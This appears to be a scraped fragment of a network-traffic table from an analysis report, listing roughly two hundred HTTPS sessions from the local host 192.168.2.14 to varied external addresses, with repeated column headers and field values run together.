                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17216192.168.2.1457230185.247.144.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17217192.168.2.14374581.62.75.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17218192.168.2.1436918217.79.249.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17219192.168.2.1439750157.245.162.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17220192.168.2.145395243.223.74.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17221192.168.2.1432796135.138.150.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17222192.168.2.1450244210.71.154.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17223192.168.2.146035896.73.25.122443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17224192.168.2.145228684.3.82.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17225192.168.2.1459714186.253.60.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17226192.168.2.145048281.242.145.69443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17227192.168.2.144810892.6.178.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17228192.168.2.1455218189.52.163.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17229192.168.2.1444142201.141.139.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17230192.168.2.14519044.10.58.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17231192.168.2.1455644154.243.114.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17232192.168.2.1440086147.157.230.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17233192.168.2.1444752190.9.22.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17234192.168.2.144327877.99.2.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17235192.168.2.1459094210.213.128.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17236192.168.2.145834019.45.15.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17237192.168.2.146087212.48.205.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17238192.168.2.1446724142.36.194.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17239192.168.2.145705059.31.160.87443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17240192.168.2.145045068.124.56.25443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17241192.168.2.143324662.113.15.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17242192.168.2.1435306174.92.50.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17243192.168.2.1447712108.206.70.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17244192.168.2.1450784163.235.245.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17245192.168.2.14432529.102.151.130443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17246192.168.2.145389836.31.176.210443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17247192.168.2.1436618121.140.41.44443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17248192.168.2.1459832177.106.41.199443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17249192.168.2.1459148124.200.226.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17250192.168.2.1441488181.237.94.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17251192.168.2.145635643.65.54.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17252192.168.2.145105832.250.86.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17253192.168.2.145952699.4.15.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17254192.168.2.144180236.83.71.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17255192.168.2.145252090.69.194.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17256192.168.2.1455454202.64.155.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17257192.168.2.143917614.153.12.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17258192.168.2.1447084175.181.251.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17259192.168.2.1449970168.210.176.156443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17260192.168.2.146038084.124.152.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17261192.168.2.1450114128.209.229.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17262192.168.2.1451254223.169.14.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17263192.168.2.1454896137.252.220.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17264192.168.2.144835034.78.193.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17265192.168.2.1439784165.172.12.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17266192.168.2.144202290.52.192.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17267192.168.2.1455020153.67.98.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17268192.168.2.1449252177.14.154.133443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17269192.168.2.143951853.251.193.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17270192.168.2.145893641.69.50.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17271192.168.2.1433428160.159.111.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17272192.168.2.1459422217.137.103.8443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17273192.168.2.145997494.252.124.45443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17274192.168.2.14428028.75.55.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17275192.168.2.1454248164.183.146.29443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17276192.168.2.143718898.62.13.194443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17277192.168.2.143484225.237.103.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17278192.168.2.1438086176.56.24.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17279192.168.2.1441696110.209.84.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17280192.168.2.144891673.171.28.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17281192.168.2.144581682.18.55.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17282192.168.2.1453618134.34.200.33443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17283192.168.2.1457658106.105.198.226443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17284192.168.2.1437170118.211.13.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17285192.168.2.1439134129.211.69.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17286192.168.2.1439900198.109.23.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17287192.168.2.1448908118.53.167.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17288192.168.2.143525873.94.172.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17289192.168.2.1435156206.246.57.76443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17290192.168.2.1459532212.236.23.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17291192.168.2.1453670168.172.34.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17292192.168.2.1456730156.114.9.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17293192.168.2.1444490212.29.255.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17294192.168.2.146091667.108.77.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17295192.168.2.1438282222.255.56.183443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17296192.168.2.1450604107.53.215.112443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17297192.168.2.1445788189.244.32.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17298192.168.2.145628649.79.205.4443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17299192.168.2.1445478125.199.91.22443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17300192.168.2.1442682172.134.61.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17301192.168.2.145363260.102.145.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17302192.168.2.145519438.170.10.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17303192.168.2.145968034.55.25.51443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17304192.168.2.1459406144.111.209.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17305192.168.2.1440824187.6.67.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17306192.168.2.1445336130.223.27.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17307192.168.2.144004431.160.91.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17308192.168.2.1445342103.244.80.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17309192.168.2.1448354109.87.103.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17310192.168.2.145209065.210.18.209443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17311192.168.2.1435570122.14.138.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17312192.168.2.143301265.243.100.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17313192.168.2.1441916198.136.51.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17314192.168.2.143298087.146.121.157443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17315192.168.2.1442774158.32.244.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17316192.168.2.1453240138.177.115.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17317192.168.2.145019891.39.61.200443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17318192.168.2.145940018.32.50.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17319192.168.2.1435242155.8.104.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17320192.168.2.145554042.185.19.156443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17321192.168.2.1454352157.208.28.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17322192.168.2.1438066116.77.219.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17323192.168.2.1442478173.75.233.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17324192.168.2.1450458223.68.106.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17325192.168.2.1444468133.254.253.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17326192.168.2.1459168212.248.6.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17327192.168.2.1448962155.190.168.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17328192.168.2.144361440.203.79.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17329192.168.2.1445462208.135.44.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17330192.168.2.14427441.194.190.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17331192.168.2.145020498.110.34.84443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17332192.168.2.1444474111.34.42.90443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17333192.168.2.1434068177.12.89.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17334192.168.2.144413093.117.221.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17335192.168.2.144037074.185.65.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17336192.168.2.14565781.140.41.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17337192.168.2.145678054.200.245.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17338192.168.2.1432968102.7.157.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17339192.168.2.143513212.249.40.207443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17340192.168.2.1456876217.241.245.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17341192.168.2.1434224138.135.83.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17342192.168.2.1450484200.88.250.18443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17343192.168.2.1458246152.201.127.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17344192.168.2.1453374106.0.36.43443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17345192.168.2.144787080.7.156.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17346192.168.2.145312438.194.216.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17347192.168.2.1453652131.171.19.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17348192.168.2.1459142146.235.64.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17349192.168.2.1438736165.24.50.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17350192.168.2.1446088208.57.188.10443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17351192.168.2.1441584115.9.130.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17352192.168.2.144460298.233.173.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17353192.168.2.145714844.134.91.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17354192.168.2.1443146105.221.8.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17355192.168.2.1435996168.36.140.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17356192.168.2.1458482172.203.162.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17357192.168.2.1439674171.15.11.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17358192.168.2.1446826115.114.213.63443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17359192.168.2.1437986210.128.84.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17360192.168.2.1448464116.226.111.120443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17361192.168.2.1460448102.194.108.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17362192.168.2.143305058.25.102.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17363192.168.2.1449280221.27.187.82443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17364192.168.2.1438454174.224.191.78443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17365192.168.2.145555057.53.41.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17366192.168.2.1443256137.233.24.36443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17367192.168.2.1459150104.217.23.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17368192.168.2.1448308179.123.220.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17369192.168.2.1444762162.170.19.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17370192.168.2.144772624.183.117.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17371192.168.2.1444792196.130.194.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17372192.168.2.1452354147.4.175.138443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17373192.168.2.143605877.201.101.159443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17374192.168.2.144190039.153.198.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17375192.168.2.1456924132.249.10.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17376192.168.2.1448762150.61.200.67443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17377192.168.2.1438218213.91.246.233443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17378192.168.2.1457368180.76.113.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17379192.168.2.1454720222.105.133.103443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17380192.168.2.143624462.54.132.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17381192.168.2.1443108130.98.132.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17382192.168.2.144054877.61.100.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17383192.168.2.1453740202.52.36.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17384192.168.2.143813067.50.114.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17385192.168.2.1456936193.14.236.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17386192.168.2.14333182.45.237.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17387192.168.2.14515041.16.0.83443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17388192.168.2.144570239.155.207.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17389192.168.2.144451225.101.88.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17390192.168.2.1453350132.176.70.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17391192.168.2.1460164198.239.148.6443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17392192.168.2.1457576161.40.29.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17393192.168.2.1447834131.241.253.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17394192.168.2.1435824147.92.150.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17395192.168.2.145997884.128.66.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17396192.168.2.1438906177.79.3.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17397192.168.2.145133072.193.216.68443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17398192.168.2.1456680206.75.89.230443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17399192.168.2.144995898.18.162.115443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17400192.168.2.1442556188.110.27.154443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17401192.168.2.1440172160.43.198.9443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17402192.168.2.1443292194.186.240.74443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17403192.168.2.144275812.56.217.158443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17404192.168.2.1453926179.134.236.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17405192.168.2.1458098199.245.198.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17406192.168.2.145879647.162.211.105443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17407192.168.2.1447252102.211.53.27443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17408192.168.2.145989620.57.234.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17409192.168.2.1438114157.182.104.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17410192.168.2.145321277.197.12.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17411192.168.2.144632834.76.145.77443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17412192.168.2.1453090222.114.23.176443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17413192.168.2.145006639.13.140.182443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17414192.168.2.1446406199.253.117.169443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17415192.168.2.1436226177.115.235.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17416192.168.2.1439240176.199.209.212443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17417192.168.2.1447620192.248.187.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17418192.168.2.144508267.127.212.192443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17419192.168.2.1439326205.174.84.70443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17420192.168.2.145751454.39.77.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17421192.168.2.1436622135.109.181.92443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17422192.168.2.1449872178.5.47.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17423192.168.2.143642461.123.153.42443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17424192.168.2.1460268121.210.4.202443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17425192.168.2.1457730182.114.181.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17426192.168.2.1433114156.247.59.249443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17427192.168.2.145193848.9.177.240443
                                                        TimestampBytes transferredDirectionData


